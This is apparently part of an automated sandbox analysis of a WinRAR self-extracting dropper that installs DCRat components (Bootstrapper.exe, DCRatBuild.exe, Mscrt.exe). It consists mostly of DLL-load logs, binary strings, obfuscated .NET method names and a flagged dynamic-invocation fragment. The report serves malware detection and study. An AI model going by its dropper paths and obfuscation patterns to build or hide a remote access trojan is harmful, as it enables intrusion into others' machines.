Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: mscoree.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: kernel.appcore.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: version.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: uxtheme.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: windows.storage.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: wldp.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: profapi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: cryptsp.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: rsaenh.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: cryptbase.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: sspicli.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ktmw32.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: wbemcomn.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: amsi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: userenv.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: iphlpapi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: dnsapi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: dhcpcsvc.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: winnsi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: rasapi32.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: rasman.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: rtutils.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: mswsock.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: winhttp.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: rasadhlp.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: fwpuclnt.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: winmm.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: winmmbase.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: mmdevapi.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: devobj.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: ksuser.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: avrt.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: audioses.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: powrprof.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: umpdc.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: msacm32.dll
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Section loaded: midimap.dll

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: wmdqEYgW2i.exe

Static file information: File size 4851200 > 1048576

Source: wmdqEYgW2i.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x49e400

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: wmdqEYgW2i.exe, DCRatBuild.exe.0.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AC9B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Bootstrapper.exe, 00000001.00000002.2101631822.00000190330B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Bootstrapper.PDB source: Bootstrapper.exe, 00000001.00000002.2101631822.00000190330E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: Bootstrapper.exe, 00000001.00000002.2094313518.0000019018E12000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AC9B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, DmcWucu9ZjDuseHj6np.cs	.Net Code: Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777245)),Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777259))})
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, DmcWucu9ZjDuseHj6np.cs	.Net Code: Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777245)),Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777259))})

.NET source code contains potential unpacker

Source: 0.0.wmdqEYgW2i.exe.409294.1.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 0.0.wmdqEYgW2i.exe.409294.1.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

File created: C:\ComponentReviewperfmonitor\__tmp_rar_sfx_access_check_7047921

Jump to behavior

Source: DCRatBuild.exe.0.dr

Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 1_2_00007FFD9B89A272 push ebx; retf	1_2_00007FFD9B89A282
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 1_2_00007FFD9B89D668 push ss; retf	1_2_00007FFD9B89D837
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2F640 push ecx; ret	3_2_00B2F653
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2EB78 push eax; ret	3_2_00B2EB96
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9B894B9B push esi; retf	10_2_00007FFD9B894BA1
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9B895358 pushfd ; ret	10_2_00007FFD9B89535B
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9B89426C pushad ; ret	10_2_00007FFD9B89426D
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9B895D28 push BEFFFFFFh; retf	10_2_00007FFD9B895D2D
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BC53C2C push esp; iretd	10_2_00007FFD9BC53C6A
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BC57379 push esp; retf	10_2_00007FFD9BC573D9
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BC53C8C push edi; iretd	10_2_00007FFD9BC53CAA
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9B884B9B push esi; retf	20_2_00007FFD9B884BA1
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9B885358 pushfd ; ret	20_2_00007FFD9B88535B
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9B88426C pushad ; ret	20_2_00007FFD9B88426D
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9B885D28 push BEFFFFFFh; retf	20_2_00007FFD9B885D2D
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC41829 push esp; ret	20_2_00007FFD9BC4182A
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC41BA9 push esi; ret	20_2_00007FFD9BC41BAA
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC47379 push esp; retf	20_2_00007FFD9BC473D9
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC416EC push edx; ret	20_2_00007FFD9BC416ED
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC41685 push ebx; ret	20_2_00007FFD9BC4169A
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC415C9 push eax; ret	20_2_00007FFD9BC415DA
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BC414F8 push eax; ret	20_2_00007FFD9BC4155A

Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, WrEdB0Hh0mgm5vA1gfn.cs	High entropy of concatenated method names: 'P9X', 'ambHt2UtQZ', 'FEnHLOeH1Ns', 'imethod_0', 'FYLHu96oXW', 'VE5alqHehpAt58uhPSru', 'uA3Zn0HesYqpm1qDBL6x', 'DX4jMgHe0qaViE1KSIqr', 'J43DoSHecaVYgFKsMgyf', 'Cu45U0HetPm83wAebH7a'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, THiFlrex5FivfVbfQ2s.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'cIyeaORS2m', 'Write', 'PEReUXTDVg', 'HwweNsOC7k', 'Flush', 'vl7'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, AKuTZRp4sx2WKlvYFL0.cs	High entropy of concatenated method names: 'PeepbDH6I6', 'lAwQudHYioARjQE8ji7T', 'k4v1eOHYbpjPT7wR9mmi', 'aRNLkYHYwCEbBUb8ZNWL', 'rrwsr4HZ2piaWQPkJUQo', 'wH43QfHZO02noRJEo5Si', 'fdZijuHZHW7BcZ5A6bRx', 'e4WtAIHZxQ9NtvNfqZpZ', 'drOaU3FXAn', 'OSGKt7HZNUfgVctYGiWP'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, X9BkVw8jYfypxoBhWxK.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'x02iWeHvFwZ0LjkQ4gDV', 'w4cKq5Hvvllp0omyoW5J', 'od9R3XHvoKSJYP9J5C3E', 'dYgwpTHvAe3H1lSBV3Ku'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, HWVmrJe5Cdq8lABRiBy.cs	High entropy of concatenated method names: 'xoGeb4E66M', 'USyez0dw4I', 'k24eJZRrPb', 'l5Me3fOwRh', 'fKoe1CZZKB', 'kVueErv8SW', 'CCqeMdfLiW', 'E9LeDHMcbO', 'u5PemWdIbe', 'vHpe0kL6Fj'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, TAfmZrN8w44YmFBSh3n.cs	High entropy of concatenated method names: 'H2pNl2rSXs', 'TsmNqy2suw', 'JkJRRGHfjZdtRdgKj8e4', 'Exkcg1Hfqi2ClrTDqKKS', 'cfjH6MHfg82cJ0WXYU3n', 'lZmQc4HfWTPLQlVWkkM2', 'RaHLUVHfBx3WGaVS8E04', 'jtD118HfrDsdlwfmVn9x', 'wVwBiiHf9X5eXglgRWBh', 'nywOrOHfTyZAHFbt4JtL'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, rhgJVaU5LGTbwTxaBJ1.cs	High entropy of concatenated method names: 'kOEUtZ936x', 'brcUusuQWP', 'p6iUix1afI', 'JisCEPH7zcQma5QOYbsE', 'ONRBSbH7b64dKlbXAtay', 'B81exmH7w4WqTlujrf3B', 'IruO80HfOJT55l307kR6', 'kYWUJj89o4', 'gwLU3YXV06', 'Q7GU1GtxFe'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, FX1ASkUFmgmNaYJr3gw.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'xuAHLR5BRnd', 'vTDHpHK1kwq', 'NH7k4HH7vRB3PCLHj18Z', 'WGr8oFH7oldcW4U2uCrS', 'KRFJpZH7A2vQOwgCy09o'
